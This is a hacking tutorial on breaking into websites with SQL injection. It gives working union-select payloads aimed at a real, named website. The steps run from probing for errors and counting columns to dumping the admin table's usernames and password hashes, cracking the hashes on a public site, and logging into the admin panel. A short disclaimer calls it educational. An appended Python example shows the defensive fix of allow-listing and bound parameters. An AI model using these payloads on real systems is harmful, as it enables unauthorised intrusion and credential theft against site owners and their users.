◆Hack Websites Using SQL Injection and Bypass its Admin Panel!

◆No Tools Needed except your Web Browser

◆Hello there. If you are wondering how to hack websites, then this tutorial is for you.

◆You might have already learnt about SQL injection from various blogs, so here I'm going directly into the tutorial, described in a more understandable way.

◆First we have to find a website vulnerable to SQL injection.
◆You will find thousands of websites from Google if you use Google dorks.

◆Here I have found a SQL injection vulnerable website.


◆We have to find whether this website is vulnerable to SQL injection or not.

◆In your web browser, type
and execute (execute means click on Go)

If you see

◆You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

◆then the website is vulnerable to SQL injection and that site can be hacked. If not, then leave that site and choose another.

◆We have found that the above site is vulnerable to SQL injection.

◆Now we have to find the columns in its database.
◆Again type

site.com/page.php?id=-2 order by 10–

◆If you see Unknown columns

◆then decrease the number until the page loads without any error
http://musculoskeletalsociety.in/page.php?id=-2 order by 10–

◆Error Unknown Columns

◆Then replace 10 with 9, 8, 7, 6, 5, 4..

◆until the page loads perfectly

◆Here the page loads fine
http://musculoskeletalsociety.in/page.php?id=-2 order by 5–

◆That means it has only 5 columns in its database

◆Now we have to find its vulnerable column

◆So here is the SQL command.

◆Now type in your web browser
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,2,3,4,5–

◆You will see numbers between 1-5 on the page

◆I have found 2 on the page, so the 2nd column is vulnerable

◆Now we have to find its database version and username.

◆So type
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,@@version,3,4,5–

◆And click on Go. You will find the database version

◆I have found 5.0 up

◆Note: you can replace @@version with version() for the database version, and
@@user or user() for the database user

◆SQL injection will be easy if the database version is 5.0 or up
◆If the database version is below 5.0
◆then we have to guess everything. We will discuss more about it soon

◆Now we have found its database version
◆Now type http://musculoskeletalsociety.in/page.php?id=-2 union+select+ 1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()–

◆You will see its tables

◆Now we want its admin table details
For that, type this command

http://musculoskeletalsociety.in/page.php?id=-2 union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=database()–

◆Now you will see its username, password, email etc. columns

◆Now we only want the username and password
◆For that, apply this command
 http://musculoskeletalsociety.in/page.php?id=-2 union+select+1,group_concat(user_id,0x3a,password),3,4,5+from admin–

◆Here admin is the table name which we got from the previous command
◆Don’t be confused: you may find admin_table or tbl_admin or administrator etc. on other websites

◆Here 0x3a is the hexadecimal value of :
◆By executing the above command you will see its username and password
◆Note: the password may be encrypted by md5 or other encryptions, so we have to decrypt it

◆Here is a website to decrypt the hash
Go to hashkiller.co.uk and decrypt it there

◆After decryption
◆Search for the website’s admin panel
◆You can find it by

◆Etc. Finally, find the admin panel somehow and enter the username and password
And enjoy..
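
◆Added example (not part of the original tutorial): why the `union select 1,2,3,4,5` and `order by 10` requests above get through, and the server-side fix that stops them. Python's sqlite3 stands in for the site's PHP/MySQL code; the table, columns and function names are assumptions, and in PHP the equivalent fix is a prepared statement with a bound parameter.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the database behind page.php.
    # Table and column names are assumptions; 5 columns to match the tutorial.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, "
               "body TEXT, author TEXT, created TEXT)")
    db.execute("INSERT INTO pages VALUES "
               "(2, 'About', 'About us', 'staff', '2020-01-01')")
    return db

def get_page_vulnerable(db, raw_id):
    # Request text is pasted into the SQL string, so everything after the
    # number is parsed as SQL, and database errors surface to the caller.
    return db.execute("SELECT * FROM pages WHERE id = " + raw_id).fetchall()

ID_RE = re.compile(r"[0-9]{1,9}")

def get_page_hardened(db, raw_id):
    # 1) Allow-list: the id must be a short run of ASCII digits, nothing else.
    if not ID_RE.fullmatch(raw_id):
        return []
    # 2) Bind the value with a placeholder so it can only ever be data.
    try:
        return db.execute(
            "SELECT id, title, body, author, created FROM pages WHERE id = ?",
            (int(raw_id),),
        ).fetchall()
    except sqlite3.Error:
        # 3) Generic empty result; the raw database error is never returned,
        #    which removes the error message the tutorial's test relies on.
        return []

def get_page_bound_only(db, raw_id):
    # Binding alone, without the allow-list: the whole string is compared
    # to the id column as one value and matches no row.
    return db.execute("SELECT * FROM pages WHERE id = ?", (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "-2 union select 1,2,3,4,5"    # request value from the tutorial
    print(get_page_vulnerable(db, probe))  # injected row comes back
    print(get_page_hardened(db, probe))    # rejected before reaching SQL
    print(get_page_hardened(db, "2"))      # normal request still works
```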

◆You can do SQL injection with some tools to save your time
◆Here I'm presenting some automated SQL injection tools for Android

Note: This tutorial is for educational purposes only. We are not responsible for any mistake or misuse done by you.

If you have any questions please feel free to ask us.



